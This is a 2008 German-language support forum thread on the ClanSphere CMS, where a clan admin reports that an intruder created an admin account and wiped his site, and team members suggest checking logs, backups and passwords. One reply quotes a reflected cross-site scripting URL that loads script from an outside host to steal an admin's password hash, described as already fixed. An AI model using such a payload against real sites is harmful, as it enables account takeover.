News - Features - Downloads - Forum - Team - Support - Switch View: Screen
Login - Registrierung - Passwort vergessen

Antworten: 12
Seite [1]
NaTzoR


Wannabe poster




Beiträge: 37
# Thema - 19.08.2008 um 08:06 Uhr
Hallo liebe Boardies,

leider habe ich eine Hiobsbotschaft zu verkünden, auf wen diese zutrifft, ist mir nicht klar, aber dennoch wollte ich euch warnen.

Gestern abend gegen ~22.30 hat es einer geschafft sich Zugang zu unserer Homepage (Die-ManiaCs.de) zu verschaffen. Er erstellte sich ein Admin Acc im Clansphere löschte alle anderen Accounts und fing an die Seite nach und nach zu killen.

Da es sehr spät war, habe ich mich als Sicherheitsmaßnahme in die Datenbank eingeloggt, seinen Account gelöscht, da ich halt selbst keinen mehr auf der Homepage hatte, und habe zunächst einmal die Datenbank umbenannt. Da ich aber nicht wusste, wie viel besagter "Hacker" draufhatte, habe ich erstmal im Angesicht der Zeit und der Tatsache, dass ich Schule habe unseren Server herunter zu fahren.

Ich will hier niemanden Angst machen, dennoch kam es bei uns schon ab und zu zu ähnlichen Fällen, seitdem wir CS benutzen, dass auch mal News "einfach so" verschwinden.

Ich denke und hoffe nicht, dass unsere Passwörter zu einfach sind, ebenso wenig hoffe ich, dass jem. aus unserem Clan Schuld ist.

Deshalb wollte ich euch nur drauf hinweisen und fragen ob es wohl eine Möglichkeit gibt, dass CS sicherer zu machen. Ich hatte auch extra den Adminbereich ausgelagert, dachte eig, dass würde es schon sicherer machen.

Gruß
NaTzoR
Inaktiv
Fr33z3m4n ClanSphere Team


Medal of Honor




Herkunft: Hamm
Beiträge: 11094
# Antwort: 1 - 19.08.2008 um 08:37 Uhr
Hmm.

Frage, was verstehst du unter noch sicherer ? Wenn jemand das PW knackt, kannst du nix mehr an Sicherheit machen. Wenn jemand über eine Hintertür an euren Webspace gekommen ist, kannst du auch nichts an Sicherheit machen, außer diese Lücke (vom Webspace Anbieter, oder du selbst, da du ja den server hast) schließen.

Viel interessanter wäre es hier, herauszufinden, wie derjenige es geschafft hat. Liegt es am CS oder sogar am Webspace-Server, oder ist es ein Clan-Mitglied oder oder oder.

Wenn News verschwinden, kann man das ganz leicht anhand der Logs (sofern du diese eingeschaltet hast) nachvollziehen. Wenn du durch die Logs nicht durchsiehst, sag bescheid, und schick mir die Logs. Ich kann sie mir gerne mal anschauen, vorallendingen was dem Vorfall von gestern betrifft.

Aber einfach den Server so runterfahren, ich weiß nicht, wenn ej keine User mehr vorhanden sind, wie soll er dann noch was machen können ? Einfach DB-Backup (sollte jeder täglich machen) aufspielen, alle Accs vorerst deaktivieren, und dann in aller Ruhe kontrollieren.


------------------
mfg
Patrick "Fr33z3m4n" Jaskulski

Antoine de Saint-Exupéry: Wenn Du ein Schiff bauen willst, so trommle nicht Männer zusammen, um Holz zu beschaffen, Aufgaben zu verteilen, sondern lehre die Männer die Sehnsucht nach dem endlosen weiten Meer.

Inaktiv
|
fay-pain


Specialist




Beiträge: 2006
# Antwort: 2 - 19.08.2008 um 08:57 Uhr
Kann mir auch nur schwer vorstellen, dass es CS liegt. Aber meistens ist es wirlich das eigene Verschulden, wie Fr33z3m4n schon sagte.

Wir hatten bis jetzt noch keine dieser Fälle, dass an dem CMS lag (z.B. Hintertür) sondern eher an den eigenen Usern oder zu einfachen Passwörtern (z.B. Admin / Test).

Versuch der Sache erstmal weiter auf den Grund zu gehen und studiere deine Logs in allen Varianten und Ausführungen. Von der Verwaltungssoftware (z.B. Plesk / FTP / etc.) bis hin zu ClanShere.
Für mich sieht es jedenfall nach einem typischen "User-Gag" aus eigenen Reihen, auch wenn man das nur ungern glauben möchte.


------------------
Manchmal hast du fay und machmal pain.
- hajo

Zuletzt editiert von fAY-pA!N am 19.08.2008 um 08:58 Uhr (1x Editiert)
Inaktiv
|
Chelrid


Geekboy





Beiträge: 1114
# Antwort: 3 - 19.08.2008 um 09:27 Uhr
kann ich mir auch nicht vorstellen, ich hab damals (bevor wir von phpkit zu CSP gewechselt haben, extra nach solchen hackversuchen gegooglet ob da was bekannt ist. und ich hab damals nix gefunden.


------------------
Grüße vom Chelrid
Und denkt dran: Immer locker durch die Hose atmen....


Inaktiv
|
n4g-Vienna-1


Rock the board





Beiträge: 73
# Antwort: 4 - 19.08.2008 um 10:34 Uhr
Wer hat ausser Dir noch vollen Zugang zur Webseite gehabt ?


------------------
::.www.net4gamer.de.::

Inaktiv
|
Jam2 ClanSphere Team


Highlander





Beiträge: 3291
# Antwort: 5 - 19.08.2008 um 11:27 Uhr
Naja, man bräuchte nichtmal vollen zugang...!

Zugang zum Datenbank import reicht schon aus! Oder auch zu den Benutzer (Rechte 5)


------------------
Gruß/ Best regards
Jam2

Nützliche Forumbeiträge/Codepastes: (Useful comments in our board / codepastes)
Template Switch for index.php
Board Navlist last posts

Edi: könnte man denn auch hier eine erweiterung einfügen?
Jam2: das web ist wie toyota.....
Edi: hö ?
Jam2: nichts ist unmöglich!


Inaktiv
|
maikoldi


Going for pro




Herkunft: Ottersberg
Beiträge: 545
# Antwort: 6 - 19.08.2008 um 11:48 Uhr
hi,
also ich hab auf einer naja nicht ganz so "legalen" seite mal eben was zu clansphere hacks gesucht und das hier gefunden,was mich irgendwie ganz schön erstaunt hat vlt hat dir ja auch ma jemand so nen link geschrieben oder sowas...


ne, das is nicht ganz richtig.
http://de.wikipedia.org/wiki/Cross-Site_Scripting
les mal^^

z.b.

http://www.clansphere.net/design.php?mod=tempdb&action=list&sort="<sCript>alert(1337)</sCript>
ausnutzung:
http://www.clansphere.net/design.php?mod=tempdb&action=list&sort="<sCrIpT src=http://1337crew.to/2.js></ScrIpT>
den link muss man dann den admin senden, und sein hash wird in ner txt datei gespeichert.
ist aber schon gefixxt, fr??her hats funktioniert.



greetz


------------------
Visit:http://www.roundowner.de
Puplicons +-



Inaktiv
|
duRiel ClanSphere Team


Weltmeister




Herkunft: Cambridge
Beiträge: 7300
# Antwort: 7 - 19.08.2008 um 13:38 Uhr
das ist ein modul hier von der webseite, an die werden ganz andere ansprüche gestellt, das svn wird die ganze zeit vom team bearbeitet und durchforstet.
im svn haben wir aber auch schon sicherheitslücken gehabt, zur zeit ist aber denke ich nichts offen.

ich gucke auch manchmal bei google ob da was neues steht, also wenns was gibt lässt ein update nicht lang auf sich warten.


Inaktiv
|
Fr33z3m4n ClanSphere Team


Medal of Honor




Herkunft: Hamm
Beiträge: 11094
# Antwort: 8 - 19.08.2008 um 13:43 Uhr
jip, hab nach diesen Thread gleich mal Google gequält, nothing found


------------------
mfg
Patrick "Fr33z3m4n" Jaskulski

Antoine de Saint-Exupéry: Wenn Du ein Schiff bauen willst, so trommle nicht Männer zusammen, um Holz zu beschaffen, Aufgaben zu verteilen, sondern lehre die Männer die Sehnsucht nach dem endlosen weiten Meer.

Inaktiv
|
Pred


Poststar




Herkunft: Bischofsmais
Beiträge: 762
# Antwort: 9 - 19.08.2008 um 14:55 Uhr
Kann mir auch nur schwer vorstellen, das es an CS liegt, da es ja als eines der sichersten CMS gilt...

Wobei man nie alle möglichkeiten ausschliessen kann, das sich vllt. doch irgendwo ne Lücke eingeschlichen hat (Ich errinere nur mal an die von mir gefundene Lücke in der Usergallerie... ist zwar nicht so schlimm, war aber eine Lücke, die lange zeit niemand entdeckt hat!)

Nichts destotrotz würde so vorgehen, wie die anderen schon sagten. Erst mal alle Logs kontrollieren, sollte dort nichts zu finden sein, die Member prüfen, vllt. war jmd sauer und hat alles gelöscht und wenn auch dort nichts zu finden ist, müsste man weiter überlegen, wo man CS so hacken kann, das man Adminzugriff bekommt!


------------------


Inaktiv
|
Billbo


Try to beat me





Beiträge: 118
# Antwort: 10 - 19.08.2008 um 16:51 Uhr
Uaaah.. schauer läuft mir über den Rücken^^
Grad noch mal penibel die Zugriffsrechte angeschaut.

Hoffe du kannst die ganze Sache aufklären.
Was meintest du mit "Adminbereich auslagern"?


Inaktiv
|
NaTzoR
Thread-Ersteller


Wannabe poster




Beiträge: 37
# Antwort: 11 - 19.08.2008 um 19:02 Uhr
Erstmal danke für eure zahlreichen Antworten.

Werde mich bemühen die Tage alle Logs durchzuforsten, ich werde da sicherlich noch hinter kommen.
Ich behaupte keineswegs das es an CS liegt, sondern wollte nur dezent draufhinweisen, denn ausschließen kann man es nicht.
Dass wir uns Feinde gemacht haben könnten, kann ich mir kaum vorstellen, aber vielleicht ist es doch so passiert. Den RootServer habe ich heruntergefahren, weil es spät war und ich mich nicht weiter gestern damit beschäftigen wollte, ich aber auch ausschließen wollte, dass er den RootServer hacked, falls er dazu fähig ist.

Mit Adminbereich auslagern meine ich die Funktion die es ermöglicht den Adminbereich außerhalb von CS zu nutzen, ergo mit vorgeschalteten htaccess-Schutz, wessen PW auch ziemlich schwierig ist, aber wie gesagt: alles ist möglich.

Einen aus eigenen Reihen verdächtige ich momentan nicht, aber ich schließe auch das nicht aus! Da ich momentan wenig Zeit habe, werde ich mich später dann nochmal melden, wenn ich mehr weiß!

Gruß und Danke
NaTzoR


Inaktiv
|
ichraffsnicht ClanSphere Team

Supporter
Supporter



Herkunft: Erdeborn bei Lutherstadt Eisleben
Beiträge: 3191
# Antwort: 12 - 22.08.2008 um 15:46 Uhr
wie verwaltest du die db??? evtl mit phpmyadmin?? is da nen gutes pw drauf?? ich hab schon so einige sachen gesehen.


------------------



Inaktiv
|
Antworten: 12
Seite [1]


Sie müssen sich registrieren, um zu antworten.


ClanSphere Project - Mailus - Imprint - Disclaimer - Scriptinfo